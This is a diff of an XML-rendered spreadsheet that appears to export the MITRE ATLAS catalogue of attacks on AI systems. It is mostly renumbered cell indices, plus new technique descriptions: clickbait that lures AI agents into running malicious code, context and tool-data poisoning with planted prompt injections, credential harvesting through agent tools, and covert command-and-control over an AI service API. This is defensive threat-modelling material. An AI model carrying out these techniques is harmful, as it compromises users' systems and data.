-        <v>747</v>
+        <v>772</v>
       </c>
       <c r="B17" t="s">
-        <v>763</v>
+        <v>788</v>
       </c>
       <c r="C17" t="s">
-        <v>713</v>
+        <v>738</v>
       </c>
       <c r="D17" t="s">
-        <v>780</v>
+        <v>805</v>
       </c>
       <c r="E17" s="2" t="s">
-        <v>796</v>
+        <v>821</v>
       </c>
       <c r="F17" t="s">
-        <v>709</v>
+        <v>717</v>
       </c>
       <c r="G17" t="s">
-        <v>709</v>
+        <v>720</v>
       </c>
     </row>
   </sheetData>
@@ -8363,743 +8447,743 @@
         <v>6</v>
       </c>
       <c r="H1" s="1" t="s">
-        <v>797</v>
+        <v>822</v>
       </c>
     </row>
     <row r="2" spans="1:8">
       <c r="A2" t="s">
-        <v>798</v>
+        <v>823</v>
       </c>
       <c r="B2" t="s">
-        <v>830</v>
+        <v>855</v>
       </c>
       <c r="C2" t="s">
-        <v>862</v>
+        <v>887</v>
       </c>
       <c r="D2" t="s">
-        <v>894</v>
+        <v>919</v>
       </c>
       <c r="E2" s="2" t="s">
-        <v>926</v>
+        <v>951</v>
       </c>
       <c r="F2" t="s">
-        <v>709</v>
+        <v>725</v>
       </c>
       <c r="G2" t="s">
-        <v>709</v>
+        <v>726</v>
       </c>
     </row>
     <row r="3" spans="1:8">
       <c r="A3" t="s">
-        <v>799</v>
+        <v>824</v>
       </c>
       <c r="B3" t="s">
-        <v>831</v>
+        <v>856</v>
       </c>
       <c r="C3" t="s">
-        <v>863</v>
+        <v>888</v>
       </c>
       <c r="D3" t="s">
-        <v>895</v>
+        <v>920</v>
       </c>
       <c r="E3" s="2" t="s">
-        <v>927</v>
+        <v>952</v>
       </c>
       <c r="F3" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
       <c r="G3" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
     </row>
     <row r="4" spans="1:8">
       <c r="A4" t="s">
-        <v>800</v>
+        <v>825</v>
       </c>
       <c r="B4" t="s">
-        <v>832</v>
+        <v>857</v>
       </c>
       <c r="C4" t="s">
-        <v>864</v>
+        <v>889</v>
       </c>
       <c r="D4" t="s">
-        <v>896</v>
+        <v>921</v>
       </c>
       <c r="E4" s="2" t="s">
-        <v>928</v>
+        <v>953</v>
       </c>
       <c r="F4" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G4" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="5" spans="1:8">
       <c r="A5" t="s">
-        <v>801</v>
+        <v>826</v>
       </c>
       <c r="B5" t="s">
-        <v>833</v>
+        <v>858</v>
       </c>
       <c r="C5" t="s">
-        <v>865</v>
+        <v>890</v>
       </c>
       <c r="D5" t="s">
-        <v>897</v>
+        <v>922</v>
       </c>
       <c r="E5" s="2" t="s">
-        <v>929</v>
+        <v>954</v>
       </c>
       <c r="F5" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
       <c r="G5" t="s">
-        <v>709</v>
+        <v>714</v>
       </c>
     </row>
     <row r="6" spans="1:8">
       <c r="A6" t="s">
-        <v>802</v>
+        <v>827</v>
       </c>
       <c r="B6" t="s">
-        <v>834</v>
+        <v>859</v>
       </c>
       <c r="C6" t="s">
-        <v>866</v>
+        <v>891</v>
       </c>
       <c r="D6" t="s">
-        <v>898</v>
+        <v>923</v>
       </c>
       <c r="E6" s="2" t="s">
-        <v>930</v>
+        <v>955</v>
       </c>
       <c r="F6" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G6" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="7" spans="1:8">
       <c r="A7" t="s">
-        <v>803</v>
+        <v>828</v>
       </c>
       <c r="B7" t="s">
-        <v>835</v>
+        <v>860</v>
       </c>
       <c r="C7" t="s">
-        <v>867</v>
+        <v>892</v>
       </c>
       <c r="D7" t="s">
-        <v>899</v>
+        <v>924</v>
       </c>
       <c r="E7" s="2" t="s">
-        <v>931</v>
+        <v>956</v>
       </c>
       <c r="F7" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G7" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="8" spans="1:8">
       <c r="A8" t="s">
-        <v>804</v>
+        <v>829</v>
       </c>
       <c r="B8" t="s">
-        <v>836</v>
+        <v>861</v>
       </c>
       <c r="C8" t="s">
-        <v>868</v>
+        <v>893</v>
       </c>
       <c r="D8" t="s">
-        <v>900</v>
+        <v>925</v>
       </c>
       <c r="E8" s="2" t="s">
-        <v>932</v>
+        <v>957</v>
       </c>
       <c r="F8" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G8" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="9" spans="1:8">
       <c r="A9" t="s">
-        <v>805</v>
+        <v>830</v>
       </c>
       <c r="B9" t="s">
-        <v>837</v>
+        <v>862</v>
       </c>
       <c r="C9" t="s">
-        <v>869</v>
+        <v>894</v>
       </c>
       <c r="D9" t="s">
-        <v>901</v>
+        <v>926</v>
       </c>
       <c r="E9" s="2" t="s">
-        <v>933</v>
+        <v>958</v>
       </c>
       <c r="F9" t="s">
-        <v>709</v>
+        <v>728</v>
       </c>
       <c r="G9" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="10" spans="1:8">
       <c r="A10" t="s">
-        <v>806</v>
+        <v>831</v>
       </c>
       <c r="B10" t="s">
-        <v>838</v>
+        <v>863</v>
       </c>
       <c r="C10" t="s">
-        <v>870</v>
+        <v>895</v>
       </c>
       <c r="D10" t="s">
-        <v>902</v>
+        <v>927</v>
       </c>
       <c r="E10" s="2" t="s">
-        <v>934</v>
+        <v>959</v>
       </c>
       <c r="F10" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G10" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="11" spans="1:8">
       <c r="A11" t="s">
-        <v>807</v>
+        <v>832</v>
       </c>
       <c r="B11" t="s">
-        <v>839</v>
+        <v>864</v>
       </c>
       <c r="C11" t="s">
-        <v>871</v>
+        <v>896</v>
       </c>
       <c r="D11" t="s">
-        <v>903</v>
+        <v>928</v>
       </c>
       <c r="E11" s="2" t="s">
-        <v>935</v>
+        <v>960</v>
       </c>
       <c r="F11" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
       <c r="G11" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
     </row>
     <row r="12" spans="1:8">
       <c r="A12" t="s">
-        <v>808</v>
+        <v>833</v>
       </c>
       <c r="B12" t="s">
-        <v>840</v>
+        <v>865</v>
       </c>
       <c r="C12" t="s">
-        <v>872</v>
+        <v>897</v>
       </c>
       <c r="D12" t="s">
-        <v>904</v>
+        <v>929</v>
       </c>
       <c r="E12" s="2" t="s">
-        <v>936</v>
+        <v>961</v>
       </c>
       <c r="F12" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
       <c r="G12" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
     </row>
     <row r="13" spans="1:8">
       <c r="A13" t="s">
-        <v>809</v>
+        <v>834</v>
       </c>
       <c r="B13" t="s">
-        <v>841</v>
+        <v>866</v>
       </c>
       <c r="C13" t="s">
-        <v>873</v>
+        <v>898</v>
       </c>
       <c r="D13" t="s">
-        <v>905</v>
+        <v>930</v>
       </c>
       <c r="E13" s="2" t="s">
-        <v>937</v>
+        <v>962</v>
       </c>
       <c r="F13" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
       <c r="G13" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
     </row>
     <row r="14" spans="1:8">
       <c r="A14" t="s">
-        <v>810</v>
+        <v>835</v>
       </c>
       <c r="B14" t="s">
-        <v>842</v>
+        <v>867</v>
       </c>
       <c r="C14" t="s">
-        <v>874</v>
+        <v>899</v>
       </c>
       <c r="D14" t="s">
-        <v>906</v>
+        <v>931</v>
       </c>
       <c r="E14" s="2" t="s">
-        <v>938</v>
+        <v>963</v>
       </c>
       <c r="F14" t="s">
-        <v>709</v>
+        <v>725</v>
       </c>
       <c r="G14" t="s">
-        <v>709</v>
+        <v>726</v>
       </c>
     </row>
     <row r="15" spans="1:8">
       <c r="A15" t="s">
-        <v>811</v>
+        <v>836</v>
       </c>
       <c r="B15" t="s">
-        <v>843</v>
+        <v>868</v>
       </c>
       <c r="C15" t="s">
-        <v>875</v>
+        <v>900</v>
       </c>
       <c r="D15" t="s">
-        <v>907</v>
+        <v>932</v>
       </c>
       <c r="E15" s="2" t="s">
-        <v>939</v>
+        <v>964</v>
       </c>
       <c r="F15" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G15" t="s">
-        <v>709</v>
+        <v>729</v>
       </c>
     </row>
     <row r="16" spans="1:8">
       <c r="A16" t="s">
-        <v>812</v>
+        <v>837</v>
       </c>
       <c r="B16" t="s">
-        <v>844</v>
+        <v>869</v>
       </c>
       <c r="C16" t="s">
-        <v>876</v>
+        <v>901</v>
       </c>
       <c r="D16" t="s">
-        <v>908</v>
+        <v>933</v>
       </c>
       <c r="E16" s="2" t="s">
-        <v>940</v>
+        <v>965</v>
       </c>
       <c r="F16" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G16" t="s">
-        <v>709</v>
+        <v>729</v>
       </c>
     </row>
     <row r="17" spans="1:7">
       <c r="A17" t="s">
-        <v>813</v>
+        <v>838</v>
       </c>
       <c r="B17" t="s">
-        <v>845</v>
+        <v>870</v>
       </c>
       <c r="C17" t="s">
-        <v>877</v>
+        <v>902</v>
       </c>
       <c r="D17" t="s">
-        <v>909</v>
+        <v>934</v>
       </c>
       <c r="E17" s="2" t="s">
-        <v>941</v>
+        <v>966</v>
       </c>
       <c r="F17" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G17" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="18" spans="1:7">
       <c r="A18" t="s">
-        <v>814</v>
+        <v>839</v>
       </c>
       <c r="B18" t="s">
-        <v>846</v>
+        <v>871</v>
       </c>
       <c r="C18" t="s">
-        <v>878</v>
+        <v>903</v>
       </c>
       <c r="D18" t="s">
-        <v>910</v>
+        <v>935</v>
       </c>
       <c r="E18" s="2" t="s">
-        <v>942</v>
+        <v>967</v>
       </c>
       <c r="F18" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
       <c r="G18" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
     </row>
     <row r="19" spans="1:7">
       <c r="A19" t="s">
-        <v>815</v>
+        <v>840</v>
       </c>
       <c r="B19" t="s">
-        <v>847</v>
+        <v>872</v>
       </c>
       <c r="C19" t="s">
-        <v>879</v>
+        <v>904</v>
       </c>
       <c r="D19" t="s">
-        <v>911</v>
+        <v>936</v>
       </c>
       <c r="E19" s="2" t="s">
-        <v>943</v>
+        <v>968</v>
       </c>
       <c r="F19" t="s">
-        <v>709</v>
+        <v>725</v>
       </c>
       <c r="G19" t="s">
-        <v>709</v>
+        <v>733</v>
       </c>
     </row>
     <row r="20" spans="1:7">
       <c r="A20" t="s">
-        <v>816</v>
+        <v>841</v>
       </c>
       <c r="B20" t="s">
-        <v>848</v>
+        <v>873</v>
       </c>
       <c r="C20" t="s">
-        <v>880</v>
+        <v>905</v>
       </c>
       <c r="D20" t="s">
-        <v>912</v>
+        <v>937</v>
       </c>
       <c r="E20" s="2" t="s">
-        <v>944</v>
+        <v>969</v>
       </c>
       <c r="F20" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G20" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="21" spans="1:7">
       <c r="A21" t="s">
-        <v>817</v>
+        <v>842</v>
       </c>
       <c r="B21" t="s">
-        <v>849</v>
+        <v>874</v>
       </c>
       <c r="C21" t="s">
-        <v>881</v>
+        <v>906</v>
       </c>
       <c r="D21" t="s">
-        <v>913</v>
+        <v>938</v>
       </c>
       <c r="E21" s="2" t="s">
-        <v>945</v>
+        <v>970</v>
       </c>
       <c r="F21" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G21" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="22" spans="1:7">
       <c r="A22" t="s">
-        <v>818</v>
+        <v>843</v>
       </c>
       <c r="B22" t="s">
-        <v>850</v>
+        <v>875</v>
       </c>
       <c r="C22" t="s">
-        <v>882</v>
+        <v>907</v>
       </c>
       <c r="D22" t="s">
-        <v>914</v>
+        <v>939</v>
       </c>
       <c r="E22" s="2" t="s">
-        <v>946</v>
+        <v>971</v>
       </c>
       <c r="F22" t="s">
-        <v>709</v>
+        <v>725</v>
       </c>
       <c r="G22" t="s">
-        <v>709</v>
+        <v>726</v>
       </c>
     </row>
     <row r="23" spans="1:7">
       <c r="A23" t="s">
-        <v>819</v>
+        <v>844</v>
       </c>
       <c r="B23" t="s">
-        <v>851</v>
+        <v>876</v>
       </c>
       <c r="C23" t="s">
-        <v>883</v>
+        <v>908</v>
       </c>
       <c r="D23" t="s">
-        <v>915</v>
+        <v>940</v>
       </c>
       <c r="E23" s="2" t="s">
-        <v>947</v>
+        <v>972</v>
       </c>
       <c r="F23" t="s">
-        <v>709</v>
+        <v>725</v>
       </c>
       <c r="G23" t="s">
-        <v>709</v>
+        <v>726</v>
       </c>
     </row>
     <row r="24" spans="1:7">
       <c r="A24" t="s">
-        <v>820</v>
+        <v>845</v>
       </c>
       <c r="B24" t="s">
-        <v>852</v>
+        <v>877</v>
       </c>
       <c r="C24" t="s">
-        <v>884</v>
+        <v>909</v>
       </c>
       <c r="D24" t="s">
-        <v>916</v>
+        <v>941</v>
       </c>
       <c r="E24" s="2" t="s">
-        <v>948</v>
+        <v>973</v>
       </c>
       <c r="F24" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G24" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="25" spans="1:7">
       <c r="A25" t="s">
-        <v>821</v>
+        <v>846</v>
       </c>
       <c r="B25" t="s">
-        <v>853</v>
+        <v>878</v>
       </c>
       <c r="C25" t="s">
-        <v>885</v>
+        <v>910</v>
       </c>
       <c r="D25" t="s">
-        <v>917</v>
+        <v>942</v>
       </c>
       <c r="E25" s="2" t="s">
-        <v>949</v>
+        <v>974</v>
       </c>
       <c r="F25" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G25" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="26" spans="1:7">
       <c r="A26" t="s">
-        <v>822</v>
+        <v>847</v>
       </c>
       <c r="B26" t="s">
-        <v>854</v>
+        <v>879</v>
       </c>
       <c r="C26" t="s">
-        <v>886</v>
+        <v>911</v>
       </c>
       <c r="D26" t="s">
-        <v>918</v>
+        <v>943</v>
       </c>
       <c r="E26" s="2" t="s">
-        <v>950</v>
+        <v>975</v>
       </c>
       <c r="F26" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G26" t="s">
-        <v>709</v>
+        <v>729</v>
       </c>
     </row>
     <row r="27" spans="1:7">
       <c r="A27" t="s">
-        <v>823</v>
+        <v>848</v>
       </c>
       <c r="B27" t="s">
-        <v>855</v>
+        <v>880</v>
       </c>
       <c r="C27" t="s">
-        <v>887</v>
+        <v>912</v>
       </c>
       <c r="D27" t="s">
-        <v>919</v>
+        <v>944</v>
       </c>
       <c r="E27" s="2" t="s">
-        <v>951</v>
+        <v>976</v>
       </c>
       <c r="F27" t="s">
-        <v>709</v>
+        <v>725</v>
       </c>
       <c r="G27" t="s">
-        <v>709</v>
+        <v>726</v>
       </c>
     </row>
     <row r="28" spans="1:7">
       <c r="A28" t="s">
-        <v>824</v>
+        <v>849</v>
       </c>
       <c r="B28" t="s">
-        <v>856</v>
+        <v>881</v>
       </c>
       <c r="C28" t="s">
-        <v>888</v>
+        <v>913</v>
       </c>
       <c r="D28" t="s">
-        <v>920</v>
+        <v>945</v>
       </c>
       <c r="E28" s="2" t="s">
-        <v>952</v>
+        <v>977</v>
       </c>
       <c r="F28" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G28" t="s">
-        <v>709</v>
+        <v>729</v>
       </c>
     </row>
     <row r="29" spans="1:7">
       <c r="A29" t="s">
-        <v>825</v>
+        <v>850</v>
       </c>
       <c r="B29" t="s">
-        <v>857</v>
+        <v>882</v>
       </c>
       <c r="C29" t="s">
-        <v>889</v>
+        <v>914</v>
       </c>
       <c r="D29" t="s">
-        <v>921</v>
+        <v>946</v>
       </c>
       <c r="E29" s="2" t="s">
-        <v>953</v>
+        <v>978</v>
       </c>
       <c r="F29" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G29" t="s">
-        <v>709</v>
+        <v>729</v>
       </c>
     </row>
     <row r="30" spans="1:7">
       <c r="A30" t="s">
-        <v>826</v>
+        <v>851</v>
       </c>
       <c r="B30" t="s">
-        <v>858</v>
+        <v>883</v>
       </c>
       <c r="C30" t="s">
-        <v>890</v>
+        <v>915</v>
       </c>
       <c r="D30" t="s">
-        <v>922</v>
+        <v>947</v>
       </c>
       <c r="E30" s="2" t="s">
-        <v>954</v>
+        <v>979</v>
       </c>
       <c r="F30" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G30" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="31" spans="1:7">
       <c r="A31" t="s">
-        <v>827</v>
+        <v>852</v>
       </c>
       <c r="B31" t="s">
-        <v>859</v>
+        <v>884</v>
       </c>
       <c r="C31" t="s">
-        <v>891</v>
+        <v>916</v>
       </c>
       <c r="D31" t="s">
-        <v>923</v>
+        <v>948</v>
       </c>
       <c r="E31" s="2" t="s">
-        <v>955</v>
+        <v>980</v>
       </c>
       <c r="F31" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G31" t="s">
-        <v>709</v>
+        <v>984</v>
       </c>
     </row>
     <row r="32" spans="1:7">
       <c r="A32" t="s">
-        <v>828</v>
+        <v>853</v>
       </c>
       <c r="B32" t="s">
-        <v>860</v>
+        <v>885</v>
       </c>
       <c r="C32" t="s">
-        <v>892</v>
+        <v>917</v>
       </c>
       <c r="D32" t="s">
-        <v>924</v>
+        <v>949</v>
       </c>
       <c r="E32" s="2" t="s">
-        <v>956</v>
+        <v>981</v>
       </c>
       <c r="F32" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G32" t="s">
-        <v>709</v>
+        <v>723</v>
       </c>
     </row>
     <row r="33" spans="1:7">
       <c r="A33" t="s">
-        <v>829</v>
+        <v>854</v>
       </c>
       <c r="B33" t="s">
-        <v>861</v>
+        <v>886</v>
       </c>
       <c r="C33" t="s">
-        <v>893</v>
+        <v>918</v>
       </c>
       <c r="D33" t="s">
-        <v>925</v>
+        <v>950</v>
       </c>
       <c r="E33" s="2" t="s">
-        <v>957</v>
+        <v>982</v>
       </c>
       <c r="F33" t="s">
-        <v>709</v>
+        <v>983</v>
       </c>
       <c r="G33" t="s">
-        <v>709</v>
+        <v>985</v>
       </c>
     </row>
   </sheetData>
@@ -9181,62 +9265,62 @@
   <sheetData>
     <row r="1" spans="1:27">
       <c r="A1" s="5" t="s">
-        <v>718</v>
+        <v>743</v>
       </c>
       <c r="B1" s="5"/>
       <c r="C1" s="5" t="s">
-        <v>713</v>
+        <v>738</v>
       </c>
       <c r="D1" s="5"/>
       <c r="E1" s="5" t="s">
-        <v>716</v>
+        <v>741</v>
       </c>
       <c r="F1" s="5"/>
       <c r="G1" s="1" t="s">
-        <v>715</v>
+        <v>740</v>
       </c>
       <c r="H1" s="5" t="s">
-        <v>721</v>
+        <v>746</v>
       </c>
       <c r="I1" s="5"/>
       <c r="J1" s="5" t="s">
-        <v>710</v>
+        <v>735</v>
       </c>
       <c r="K1" s="5"/>
       <c r="L1" s="1" t="s">
-        <v>764</v>
+        <v>789</v>
       </c>
       <c r="M1" s="5" t="s">
-        <v>719</v>
+        <v>744</v>
       </c>
       <c r="N1" s="5"/>
       <c r="O1" s="1" t="s">
-        <v>722</v>
+        <v>747</v>
       </c>
       <c r="P1" s="5" t="s">
-        <v>717</v>
+        <v>742</v>
       </c>
       <c r="Q1" s="5"/>
       <c r="R1" s="1" t="s">
-        <v>730</v>
+        <v>755</v>
       </c>
       <c r="S1" s="5" t="s">
-        <v>712</v>
+        <v>737</v>
       </c>
       <c r="T1" s="5"/>
       <c r="U1" s="5" t="s">
-        <v>720</v>
+        <v>745</v>
       </c>
       <c r="V1" s="5"/>
       <c r="W1" s="1" t="s">
-        <v>729</v>
+        <v>754</v>
       </c>
       <c r="X1" s="5" t="s">
-        <v>724</v>
+        <v>749</v>
       </c>
       <c r="Y1" s="5"/>
       <c r="Z1" s="5" t="s">
-        <v>714</v>
+        <v>739</v>
       </c>
       <c r="AA1" s="5"/>
     </row>

--- a/excel-files/atlas.xlsx
+++ b/excel-files/atlas.xlsx
@@ -17,7 +17,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1814" uniqueCount="986">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1909" uniqueCount="1041">
   <si>
     <t>ID</t>
   </si>
@@ -46,9 +46,18 @@
     <t>platforms</t>
   </si>
   <si>
+    <t>AML.T0100</t>
+  </si>
+  <si>
     <t>AML.T0080</t>
   </si>
   <si>
+    <t>AML.T0098</t>
+  </si>
+  <si>
+    <t>AML.T0099</t>
+  </si>
+  <si>
     <t>AML.T0053</t>
   </si>
   <si>
@@ -67,6 +76,9 @@
     <t>AML.T0040</t>
   </si>
   <si>
+    <t>AML.T0096</t>
+  </si>
+  <si>
     <t>AML.T0010.001</t>
   </si>
   <si>
@@ -136,6 +148,9 @@
     <t>AML.T0010.002</t>
   </si>
   <si>
+    <t>AML.T0101</t>
+  </si>
+  <si>
     <t>AML.T0085</t>
   </si>
   <si>
@@ -244,6 +259,9 @@
     <t>AML.T0088</t>
   </si>
   <si>
+    <t>AML.T0102</t>
+  </si>
+  <si>
     <t>AML.T0016.002</t>
   </si>
   <si>
@@ -463,12 +481,24 @@
     <t>AML.T0042</t>
   </si>
   <si>
+    <t>AML.T0097</t>
+  </si>
+  <si>
     <t>AML.T0043.000</t>
   </si>
   <si>
+    <t>attack-pattern--bd74bd28-20ce-5f69-972e-0afe627b7147</t>
+  </si>
+  <si>
     <t>attack-pattern--785ca1b4-7d17-51f1-a605-46a9f21fb9b0</t>
   </si>
   <si>
+    <t>attack-pattern--daca6b9c-9073-5aef-8017-737d1aa51f6d</t>
+  </si>
+  <si>
+    <t>attack-pattern--7330bae1-3905-5446-838f-c9476ef52978</t>
+  </si>
+  <si>
     <t>attack-pattern--b23b5475-a05e-5b4a-8e9f-8c758dd0cda8</t>
   </si>
   <si>
@@ -487,6 +517,9 @@
     <t>attack-pattern--5ac1f849-523e-51bf-a1e9-1a97ab91cc91</t>
   </si>
   <si>
+    <t>attack-pattern--92a68652-d864-5c9c-9c1d-64ec09587390</t>
+  </si>
+  <si>
     <t>attack-pattern--3bf297c5-2ab2-573a-aa4e-f20af3d2643c</t>
   </si>
   <si>
@@ -556,6 +589,9 @@
     <t>attack-pattern--ca5a090b-feaf-575d-98c6-61930fffc5b5</t>
   </si>
   <si>
+    <t>attack-pattern--4a9bacd2-7c04-5c4b-bed3-b469450d0f9e</t>
+  </si>
+  <si>
     <t>attack-pattern--536e5c26-d36d-583d-a441-bc259d170fab</t>
   </si>
   <si>
@@ -664,6 +700,9 @@
     <t>attack-pattern--fa9aa1b8-8084-569e-9253-232b0fa8d107</t>
   </si>
   <si>
+    <t>attack-pattern--4c46c93f-47b3-5ace-8c6c-a15cb1a55dd2</t>
+  </si>
+  <si>
     <t>attack-pattern--6635775c-5539-5512-95f1-a0e085770699</t>
   </si>
   <si>
@@ -883,12 +922,24 @@
     <t>attack-pattern--8981726f-193d-5528-9adf-5e4a2cebfeab</t>
   </si>
   <si>
+    <t>attack-pattern--d21c2e27-f274-50d0-947c-b44bae1e6b66</t>
+  </si>
+  <si>
     <t>attack-pattern--5f8f898d-1e29-52a7-bf95-2d420313aee8</t>
   </si>
   <si>
+    <t>AI Agent Clickbait</t>
+  </si>
+  <si>
     <t>AI Agent Context Poisoning</t>
   </si>
   <si>
+    <t>AI Agent Tool Credential Harvesting</t>
+  </si>
+  <si>
+    <t>AI Agent Tool Data Poisoning</t>
+  </si>
+  <si>
     <t>AI Agent Tool Invocation</t>
   </si>
   <si>
@@ -907,6 +958,9 @@
     <t>AI Model Inference API Access</t>
   </si>
   <si>
+    <t>AI Service API</t>
+  </si>
+  <si>
     <t>AI Software</t>
   </si>
   <si>
@@ -976,6 +1030,9 @@
     <t>Data</t>
   </si>
   <si>
+    <t>Data Destruction via AI Agent Tool Invocation</t>
+  </si>
+  <si>
     <t>Data from AI Services</t>
   </si>
   <si>
@@ -1084,6 +1141,9 @@
     <t>Generate Deepfakes</t>
   </si>
   <si>
+    <t>Generate Malicious Commands</t>
+  </si>
+  <si>
     <t>Generative AI</t>
   </si>
   <si>
@@ -1303,11 +1363,24 @@
     <t>Verify Attack</t>
   </si>
   <si>
+    <t>Virtualization/Sandbox Evasion</t>
+  </si>
+  <si>
     <t>White-Box Optimization</t>
+  </si>
+  <si>
+    <t>Adversaries may craft deceptive web content designed to bait Computer-Using AI agents or AI web browsers into taking unintended actions, such as clicking buttons, copying code, or navigating to specific web pages. These attacks exploit the agent's interpretation of UI content, visual cues, or prompt-like language embedded in the site. When successful, they can lead the agent to inadvertently copy and execute malicious code on the user's operating system.</t>
   </si>
   <si>
     <t>Adversaries may attempt to manipulate the context used by an AI agent's large language model (LLM) to influence the responses it generates or actions it takes. This allows an adversary to persistently change the behavior of the target agent and further their goals.
 Context poisoning can be accomplished by prompting the an LLM to add instructions or preferences to memory (See [Memory](/techniques/AML.T0080.000)) or by simply prompting an LLM that uses prior messages in a thread as part of its context (See [Thread](/techniques/AML.T0080.001)).</t>
+  </si>
+  <si>
+    <t>Adversaries may attempt to use their access to an AI agent on the victim's system to retrieve data from available agent tools to collect credentials. Agent tools may connect to a wide range of sources that may contain credentials including document stores (e.g. SharePoint, OneDrive or Google Drive), code repositories (e.g. GitHub or GitLab), or enterprise productivity tools (e.g. as email providers or Slack), and local notetaking tools (e.g. Obsidian or Apple Notes).</t>
+  </si>
+  <si>
+    <t>Adversaries may place malicious content on a victim's system where it can be retrieved by an AI Agent Tool. This may be accomplished by placing documents in a location that will be ingested by a service the AI agent has associated tools for.
+The content may be targeted such that it would often be retrieved by common queries. The adversary's content may include false or misleading information. It may also include prompt injections with malicious instructions.</t>
   </si>
   <si>
     <t>Adversaries may use their access to an AI agent to invoke tools the agent has access to. LLMs are often connected to other services or resources via tools to increase their capabilities. Tools may include integrations with other applications, access to public or private data sources, and the ability to execute code.
@@ -1337,6 +1410,12 @@
     <t>Adversaries may gain access to a model via legitimate access to the inference API.
 Inference API access can be a source of information to the adversary ([Discover AI Model Ontology](/techniques/AML.T0013), [Discover AI Model Family](/techniques/AML.T0014)), a means of staging the attack ([Verify Attack](/techniques/AML.T0042), [Craft Adversarial Data](/techniques/AML.T0043)), or for introducing data to the target system for Impact ([Evade AI Model](/techniques/AML.T0015), [Erode AI Model Integrity](/techniques/AML.T0031)).
 Many systems rely on the same models provided via an inference API, which means they share the same vulnerabilities. This is especially true of foundation models which are prohibitively resource intensive to train. Adversaries may use their access to model APIs to identify vulnerabilities such as jailbreaks or hallucinations and then target applications that use the same models.</t>
+  </si>
+  <si>
+    <t>Adversaries may communicate using the API of an AI service on the victim's system. The adversary's commands to the victim system, and often the results, are embedded in the normal traffic of the AI service.
+An AI service API command and control channel is covert because the adversary's commands blend in with normal communications, so an adversary may use this technique to avoid detection. Using existing infrastructure on the victim's system allows the adversary to live off the land, further reducing their footprint.
+AI service APIs may be abused as C2 channels when an adversary wants to be stealthy and maintain long-term persistence for espionage activities [\[1\]][1].
+[1]: https://www.microsoft.com/en-us/security/blog/2025/11/03/sesameop-novel-backdoor-uses-openai-assistants-api-for-command-and-control/</t>
   </si>
   <si>
     <t>Most AI systems rely on a limited set of AI frameworks.
@@ -1394,7 +1473,7 @@
   </si>
   <si>
     <t>Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.
-Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS). They are commonly used for AI services such as chatbots, LLMs, and predictive inference APIs.</t>
+Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, software-as-a-service (SaaS), and AI-as-a-service(AIaaS). They are commonly used for AI services such as chatbots, LLMs, and predictive inference APIs.</t>
   </si>
   <si>
     <t xml:space="preserve">In Black-Box attacks, the adversary has black-box (i.e. [AI Model Inference API Access](/techniques/AML.T0040) via API access) access to the target model.
@@ -1414,10 +1493,9 @@
     <t>Adversaries may manipulate the citations provided in an AI system's response, in order to make it appear trustworthy. Variants include citing a providing the wrong citation, making up a new citation, or providing the right citation but for adversary-provided data.</t>
   </si>
   <si>
-    <t>An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
